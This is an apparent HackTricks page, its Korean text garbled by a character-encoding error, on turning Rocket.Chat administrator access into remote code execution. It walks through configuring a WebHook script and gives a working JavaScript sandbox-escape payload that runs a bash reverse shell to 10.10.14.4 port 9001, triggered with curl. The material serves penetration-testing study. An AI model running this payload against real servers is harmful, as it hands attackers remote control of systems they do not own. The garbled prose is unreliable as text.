๋ก์ผ ์ฑ
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
RCE
๋ก์ผ ์ฑ์์ ๊ด๋ฆฌ์์ธ ๊ฒฝ์ฐ RCE๋ฅผ ์ป์ ์ ์์ต๋๋ค.
- **
Integrations**๋ก ๊ฐ์ **New Integration**์ ์ ํํ๊ณIncoming WebHook๋๋Outgoing WebHook์ค ํ๋๋ฅผ ์ ํํฉ๋๋ค. /admin/integrations/incoming
.png)
- ๋ฌธ์์ ๋ฐ๋ฅด๋ฉด, ๋ ๊ฐ์ง ๋ชจ๋ ES2015 / ECMAScript 6 (๊ธฐ๋ณธ์ ์ผ๋ก JavaScript)๋ฅผ ์ฌ์ฉํ์ฌ ๋ฐ์ดํฐ๋ฅผ ์ฒ๋ฆฌํฉ๋๋ค. ๊ทธ๋์ ์๋ฐ์คํฌ๋ฆฝํธ์ฉ rev shell์ ์ป์ด๋ด ์๋ค:
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- WebHook์ ๊ตฌ์ฑํฉ๋๋ค (์ฑ๋๊ณผ ์ฌ์ฉ์ ์ด๋ฆ์ผ๋ก ๊ฒ์๋ฌผ์ด ์กด์ฌํด์ผ ํฉ๋๋ค):
.png)
- WebHook ์คํฌ๋ฆฝํธ๋ฅผ ๊ตฌ์ฑํฉ๋๋ค:
.png)
- ๋ณ๊ฒฝ ์ฌํญ ์ ์ฅ
- ์์ฑ๋ WebHook URL์ ๊ฐ์ ธ์ต๋๋ค:
.png)
- curl๋ก ํธ์ถํ๋ฉด rev shell์ ๋ฐ์ ์ ์์ต๋๋ค.
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


